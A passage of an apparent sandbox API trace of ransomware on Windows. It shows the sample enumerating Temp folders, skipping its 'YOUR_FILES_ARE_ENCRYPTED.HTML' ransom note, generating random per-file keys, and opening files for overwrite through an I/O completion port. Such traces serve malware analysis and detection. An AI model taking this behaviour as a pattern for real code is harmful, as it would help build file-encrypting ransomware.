(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\buuqvbj.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.110] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=3435) returned 1 [0164.110] GetProcessHeap () returned 0x270000 [0164.110] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.111] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="EC") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="00") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="2C") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="F5") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="2F") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="89") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="16") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E1") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="CC") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="21") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="35") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="37") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="52") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="17") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="63") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="8E") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="CD") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="E8") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="A1") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="B9") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="51") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="22") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="D6") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="DE") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="8A") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E1") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="68") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="25") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="13") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="9C") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="27") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="69") returned 2 [0164.113] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi" [0164.113] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.113] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.136] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b5ea70, ftCreationTime.dwHighDateTime=0x1d7e4dd, ftLastAccessTime.dwLowDateTime=0x1b58e0e0, ftLastAccessTime.dwHighDateTime=0x1d7e6ce, ftLastWriteTime.dwLowDateTime=0x1b58e0e0, ftLastWriteTime.dwHighDateTime=0x1d7e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x70f9, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="DidKyJ.flv", cAlternateFileName="")) returned 1 [0164.136] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv") returned 53 [0164.136] lstrcmpW (lpString1="DidKyJ.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.136] PathFindExtensionW (pszPath="DidKyJ.flv") returned=".flv" [0164.136] lstrlenW (lpString=".flv") returned 4 [0164.136] PathFindExtensionW (pszPath="DidKyJ.flv") returned=".flv" [0164.136] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\didkyj.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.137] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=28921) returned 1 [0164.137] GetProcessHeap () returned 0x270000 [0164.137] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.138] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="17") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="B0") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C2") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="87") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="C7") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DD") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="08") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="0E") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="C8") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="7E") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F4") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="38") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="FE") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7A") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="FD") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="42") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="98") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="80") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="13") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="49") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="63") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AB") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="36") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="02") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="01") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="28") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="92") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="BC") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="FB") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="0C") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="9E") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="77") returned 2 [0164.140] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv" [0164.140] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.140] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.152] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4f3cf80, ftCreationTime.dwHighDateTime=0x1d7de31, ftLastAccessTime.dwLowDateTime=0x461a4970, ftLastAccessTime.dwHighDateTime=0x1d7de65, ftLastWriteTime.dwLowDateTime=0x461a4970, ftLastWriteTime.dwHighDateTime=0x1d7de65, nFileSizeHigh=0x0, nFileSizeLow=0x9480, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Ezjziivl4A.gif", cAlternateFileName="EZJZII~1.GIF")) returned 1 [0164.152] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif") returned 57 [0164.152] lstrcmpW (lpString1="Ezjziivl4A.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.152] PathFindExtensionW (pszPath="Ezjziivl4A.gif") returned=".gif" [0164.152] lstrlenW (lpString=".gif") returned 4 [0164.152] PathFindExtensionW (pszPath="Ezjziivl4A.gif") returned=".gif" [0164.152] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\ezjziivl4a.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.153] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=38016) returned 1 [0164.153] GetProcessHeap () returned 0x270000 [0164.153] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.154] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="90") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="6C") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="CF") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="61") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="FB") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="2B") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="45") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="43") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1F") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="AA") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E5") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="88") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="45") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="D2") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BA") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B1") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="75") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F2") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B6") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="E8") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="C9") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="C8") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="4B") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="00") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="77") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="D1") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="99") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A7") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="69") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="29") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="46") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4A") returned 2 [0164.155] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif" [0164.155] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.155] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.159] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd18e470, ftCreationTime.dwHighDateTime=0x1d7d90c, ftLastAccessTime.dwLowDateTime=0x83373e10, ftLastAccessTime.dwHighDateTime=0x1d7dbdd, ftLastWriteTime.dwLowDateTime=0x83373e10, ftLastWriteTime.dwHighDateTime=0x1d7dbdd, nFileSizeHigh=0x0, nFileSizeLow=0x687b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="FMDT A0se5XpB9Td_C.wav", cAlternateFileName="FMDTA0~1.WAV")) returned 1 [0164.165] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav") returned 65 [0164.165] lstrcmpW (lpString1="FMDT A0se5XpB9Td_C.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.165] PathFindExtensionW (pszPath="FMDT A0se5XpB9Td_C.wav") returned=".wav" [0164.165] lstrlenW (lpString=".wav") returned 4 [0164.165] PathFindExtensionW (pszPath="FMDT A0se5XpB9Td_C.wav") returned=".wav" [0164.165] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\fmdt a0se5xpb9td_c.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.166] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=26747) returned 1 [0164.166] GetProcessHeap () returned 0x270000 [0164.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.167] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="BA") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D1") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="A1") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A4") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="C4") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="69") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A6") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="57") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="88") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A4") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A3") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="31") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="A3") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="14") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C8") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="48") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="BD") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="98") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="87") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="CD") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A6") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="48") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="71") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="21") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="2A") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BD") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="C1") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="ED") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="0D") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="89") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="5E") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="65") returned 2 [0164.168] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav" [0164.168] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.168] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.177] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xdc63ddb0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdc63ddb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0164.177] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 65 [0164.177] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.177] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0164.177] lstrlenW (lpString=".txt") returned 4 [0164.177] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0164.177] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0164.178] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="gen_py", cAlternateFileName="")) returned 1 [0164.178] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py") returned 49 [0164.178] GetProcessHeap () returned 0x270000 [0164.178] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0164.179] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py" [0164.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\*" [0164.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 1 [0164.180] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8") returned 53 [0164.180] GetProcessHeap () returned 0x270000 [0164.180] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0164.182] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8" [0164.182] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\*" [0164.182] FindFirstFileW (in: 